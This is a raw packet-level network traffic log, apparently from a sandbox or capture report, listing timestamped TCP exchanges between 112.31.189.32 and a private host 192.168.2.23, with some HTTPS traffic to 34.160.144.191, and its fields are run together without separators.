                                                                                                                                                                                                    Dec 19, 2024 15:47:42.002214909 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.008445024 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.008578062 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.015049934 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.015072107 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.021080017 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.021205902 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.027477026 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.027513981 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.027518988 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.034056902 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.034163952 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.040086031 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.040280104 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.046422005 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.046581984 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.052812099 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.052983999 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.059036970 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.059082985 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.059227943 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.065701962 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.065756083 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.071933985 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.072005033 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.078222036 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.078315973 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.084512949 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.084611893 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.090827942 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.090874910 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.090950966 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.097328901 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.097762108 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.103527069 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.103609085 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.109793901 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.109883070 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.116235018 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.133898020 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.147542000 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.147696018 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.148267031 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.150784969 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.150829077 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.173691988 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.173721075 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.173732996 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.173754930 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.191385031 CET38694443192.168.2.2334.160.144.191
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.191406965 CET4433869434.160.144.191192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.191528082 CET38694443192.168.2.2334.160.144.191
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.191533089 CET4433869434.160.144.191192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.191612959 CET4433869434.160.144.191192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.191658020 CET38694443192.168.2.2334.160.144.191
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.191663980 CET4433869434.160.144.191192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.191719055 CET38694443192.168.2.2334.160.144.191
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.274394035 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.274429083 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.274437904 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.274465084 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.275135994 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.275171995 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.275249004 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.275285006 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.277930975 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.277967930 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.278036118 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.278076887 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.281039000 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.281080961 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.281222105 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.281263113 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.283895969 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.283926010 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.283938885 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.283972979 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.286293030 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.286334991 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.286387920 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.286422968 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.289066076 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.289113998 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.289177895 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.289211035 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.291883945 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.291922092 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.292411089 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.292450905 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.294770956 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.294828892 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.294881105 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.294917107 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.297485113 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.297523022 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.297648907 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.297705889 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.300194025 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.300230026 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.300299883 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.300335884 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.303042889 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.303083897 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.303169012 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.303211927 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.305820942 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.305866957 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.305901051 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.305936098 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.308757067 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.308794975 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.308984041 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.309020996 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.311480045 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.311495066 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.311517954 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.311528921 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.314150095 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.314189911 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.314224958 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.314264059 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.316937923 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.316976070 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.317068100 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.317104101 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.319689035 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.319722891 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.319734097 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.319768906 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.322458982 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.322496891 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.323858976 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.323879957 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.323908091 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.323908091 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.326735020 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.326772928 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.326852083 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.326929092 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.329503059 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.329543114 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.329615116 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.329654932 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.332250118 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.332285881 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.332309961 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.332344055 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.335012913 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.335051060 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.335129976 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.335166931 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.337809086 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.337846994 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.337893009 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.337939978 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.340622902 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.340658903 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.340660095 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.340691090 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.343381882 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.343420029 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.343463898 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.343502045 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.346147060 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.346188068 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.346230984 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.346273899 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.348989010 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.349029064 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.349108934 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.349142075 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.351706982 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.351743937 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.351764917 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.351799011 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.394087076 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.394128084 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.394169092 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.394195080 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.395457029 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.395489931 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.395535946 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.395572901 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.398190975 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.398230076 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.399560928 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.399599075 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.399728060 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.399768114 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.402376890 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.402415991 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.402519941 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.402559996 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.405211926 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.405234098 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.405253887 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.405267954 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.407941103 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.407989025 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.408009052 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.408041954 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.410778999 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.410823107 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.410846949 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.410881996 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.413548946 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.413593054 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.413633108 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.413677931 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.416388988 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.416429996 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.416521072 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.416562080 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.419099092 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.419140100 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.419249058 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.419291973 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.421947956 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.421998978 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.422060013 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.422095060 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.466829062 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.466846943 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.466870070 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.466886997 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.467679977 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.467715979 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.468213081 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.468247890 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.468310118 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.468344927 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.471107960 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.471143961 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.471191883 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.471230030 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.473829031 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.473865032 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.473874092 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.473915100 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.476597071 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.476630926 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.476850986 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.476882935 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.479398012 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.479433060 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.479520082 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.479553938 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.482158899 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.482189894 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.482251883 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.482287884 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.509625912 CET4433869434.160.144.191192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.509676933 CET38694443192.168.2.2334.160.144.191
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.509691000 CET4433869434.160.144.191192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.509721041 CET4433869434.160.144.191192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.509737015 CET38694443192.168.2.2334.160.144.191
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.509989023 CET38694443192.168.2.2334.160.144.191
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.510008097 CET4433869434.160.144.191192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.510019064 CET38694443192.168.2.2334.160.144.191
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.510026932 CET4433869434.160.144.191192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.567590952 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.567622900 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.567634106 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.567665100 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.567758083 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.567801952 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.567929029 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.567965031 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.569164038 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.569196939 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.569299936 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.569343090 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.570550919 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.570595026 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.570677042 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.570714951 CET3923640158192.168.2.23112.31.189.32
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.571960926 CET4015839236112.31.189.32192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:42.572000980 CET3923640158192.168.2.23112.31.189.32
